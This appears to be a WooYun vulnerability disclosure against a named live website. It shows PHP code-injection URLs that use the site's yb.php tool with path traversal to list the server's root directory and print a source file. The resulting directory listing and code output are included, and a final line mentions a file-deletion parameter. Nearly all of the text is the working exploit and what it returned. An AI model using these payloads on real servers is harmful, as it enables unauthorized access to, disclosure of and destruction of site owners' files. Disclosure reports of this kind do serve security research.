WooYun.org

http://www.netbs.cn/tool/yb/yb.php?q=${@exit(print_r(scandir($_GET[d])))}&d=../../

Array
(
    [0] => .
    [1] => ..
    [2] => 123
    [3] => 168
    [4] => 20130720195947.rar
    [5] => 2345
    [6] => 360buy-union.txt
    [7] => 82051.txt
    [8] => HTML
    [9] => Plugins
    [10] => Top-verification.html
    [11] => _WU8G02t5Wuoiw5yWg4Cfd4wz5g.html
    [12] => a
    [13] => about
    [14] => ad
    [15] => api
    [16] => aspnet_client
    [17] => baidu_verify_729eGdarRG.html
    [18] => baidunews.xml
    [19] => bbs
    [20] => bdsitemap.txt
    [21] => bdunion.txt
    [22] => cert
    [23] => check.txt
    [24] => css
    [25] => en
    [26] => favicon.ico
    [27] => google59c3fe0e4120c597.html
    [28] => gs_union_verify_file.html
    [29] => home
    [30] => images
    [31] => include
    [32] => index
    [33] => index.html
    [34] => index.php
    [35] => info
    [36] => kLtLsTFNw_UD3XyZOfqZvQrBNHc.html
    [37] => license.txt
    [38] => main
    [39] => mainindex.html
    [40] => member
    [41] => netbsdede
    [42] => netbsmain.html
    [43] => news
    [44] => plus
    [45] => qqmail_domain_verify.txt
    [46] => robots.php
    [47] => robots.txt
    [48] => robots2.txt
    [49] => shop
    [50] => shuiyin.jpg
    [51] => sitemap.html
    [52] => sitemap.xml
    [53] => sitemaps.xml
    [54] => special
    [55] => tags.php
    [56] => templets
    [57] => tool
    [58] => uc_client
    [59] => upload.php
    [60] => uploads
    [61] => version.inc.php
)
1

Array
(
    [0] => <?php
    [1] => function is_domain($domain){
    [2] => 	if(preg_match("/^([0-9a-z\-]{1,}\.)?[0-9a-z\-]{2,}\.([0-9a-z\-]{2,}\.)?[a-z]{2,}$/i", $domain))	{
    [3] => 		return true;
    [4] => 	}else{
    [5] => 		return false;
    [6] => 	}
    [7] => }
    [8] => 
    [9] => function get_content($url){
    [10] => 	if(!strpos($url, '://')) return 'Invalid URI';
    [11] => 	$content = '';
    [12] => 	if(ini_get('allow_url_fopen')){
    [13] => 	    $cnt=0;
    [14] =>         while($cnt < 15 && ($content=@file_get_contents($url))===FALSE) $cnt++;		
    [15] => 	}
    [16] => 	elseif(function_exists('curl_init')){
    [17] => 		$handle = curl_init();
    [18] => 		curl_setopt($handle, CURLOPT_URL, $url);
    [19] => 		curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 5);
    [20] => 		curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1);
    [21] => 		curl_setopt($handle, CURLOPT_FOLLOWLOCATION, 0);
    [22] => 		$content = curl_exec($handle);
    [23] => 		curl_close($handle);
    [24] => 	}
    [25] => 	elseif(function_exists('fsockopen')){
    [26] => 		$urlinfo = parse_url($url);
    [27] => 		$host    = $urlinfo['host'];
    [28] => 		$str     = explode($host, $url);
    [29] => 		$uri     = $str[1];
    [30] => 		unset($urlinfo, $str);
    [31] => 		$content = '';
    [32] => 		$fp = fsockopen($host, 80, $errno, $errstr, 30);
    [33] => 		if(!$fp){
    [34] => 			$content = 'Can Not Open Socket...';
    [35] => 		}
    [36] => 		else{
    [37] => 			$out = "GET $uri   HTTP/1.1\r\n";
    [38] => 			$out.= "Host: $host \r\n";
    [39] => 			$out.= "Accept: */*\r\n";
    [40] => 			$out.= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
    [41] => 			$out.= "Connection: Close\r\n\r\n";
    [42] => 			fputs($fp, $out);
    [43] => 			while (!feof($fp)){
    [44] => 				$content .= fgets($fp, 4069);
    [45] => 			}
    [46] => 			fclose($fp);
    [47] => 		}
    [48] => 	}
    [49] => 	if(empty($content)) $content = '无法打开该链接！';
    [50] => 	return $content;
    [51] => }
    [52] => ?>
)

view-source:http://www.netbs.cn/tool/yb/yb.php?q=${@exit(print_r(file($_GET[d])))}&d=../../tool/global.php

删除文件，参数n为文件名